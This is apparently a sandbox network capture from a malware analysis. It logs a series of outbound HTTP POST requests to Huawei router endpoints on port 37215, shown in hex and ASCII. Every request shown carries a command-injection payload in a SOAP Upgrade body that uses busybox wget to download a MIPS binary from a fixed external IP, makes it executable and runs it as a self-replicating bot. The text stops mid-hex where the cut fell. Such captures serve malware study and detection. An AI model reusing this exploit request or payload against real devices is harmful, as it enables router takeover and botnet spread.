                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2442192.168.2.2348582157.177.206.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.698503017 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2443192.168.2.2332880157.135.136.10637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.698548079 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2444192.168.2.2352818157.220.78.6937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.698599100 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2445192.168.2.233552241.5.175.2937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.699110985 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2446192.168.2.2355800176.146.135.437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.700443983 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2447192.168.2.2345940157.62.16.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.700447083 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2448192.168.2.234912441.58.19.15737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.700520039 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2449192.168.2.2360916157.242.62.1137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.701221943 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2450192.168.2.2341346197.155.61.8237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.701297045 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2451192.168.2.2336402197.240.10.13037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.702609062 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
